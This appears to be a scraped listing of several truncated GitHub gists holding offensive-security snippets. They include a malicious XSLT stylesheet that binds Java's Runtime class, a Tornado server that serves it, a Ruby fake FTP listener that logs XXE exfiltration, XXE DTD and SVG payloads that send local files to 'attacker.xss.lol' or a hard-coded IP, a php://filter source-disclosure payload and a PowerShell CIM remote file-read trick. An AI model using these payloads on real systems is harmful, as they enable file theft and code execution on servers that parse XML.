This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<xsl:stylesheet version="1.0" | |
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" | |
xmlns:date="http://xml.apache.org/xalan/java/java.util.Date" | |
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" | |
xmlns:str="http://xml.apache.org/xalan/java/java.lang.String" | |
exclude-result-prefixes="date"> | |
<xsl:output method="text"/> | |
<xsl:template match="/"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from tornado.ioloop import IOLoop | |
import tornado.web | |
import time | |
class MainHandler(tornado.web.RequestHandler): | |
def get(self): | |
with open("malicious.xsl","r") as file: | |
self.write(file.read()) | |
self.flush() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'socket' | |
ftp_server = TCPServer.new 443 | |
log = File.open( "xxe-ftp.log", "a") | |
Thread.start do | |
loop do | |
Thread.start(ftp_server.accept) do |ftp_client| | |
puts "FTP. New client connected" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!ENTITY % all "<!ENTITY send SYSTEM | |
'gopher://attacker.xss.lol:2200/?%file;'>"> %all;⏎ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE foo [ | |
<!ENTITY % file SYSTEM "file:///"> | |
<!ENTITY % dtd SYSTEM "http://192.99.71.144:8888/remote_ftp.dtd"> | |
%dtd;]> | |
<svg xmlns="http://www.w3.org/2000/svg" width="12cm" height="12cm"> | |
<text>Hello&send;</text> | |
</svg> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE foo [ | |
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=test_dev.php"> | |
]> | |
<feed> | |
<title>test</title> | |
<description>test</description> | |
<entry> | |
<title>Hello</title> | |
<link href="http://example.com"></link> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"crypto/aes" | |
"crypto/cipher" | |
"encoding/base64" | |
"encoding/hex" | |
"fmt" | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$CimSession = New-CimSession -ComputerName 10.0.0.2 | |
$FilePath = 'C:\Windows\System32\notepad.exe' | |
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation. | |
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession | |
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly | |
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession | |
$FileLengthBytes = $FileContents.FileData[0..3] | |
[Array]::Reverse($FileLengthBytes) |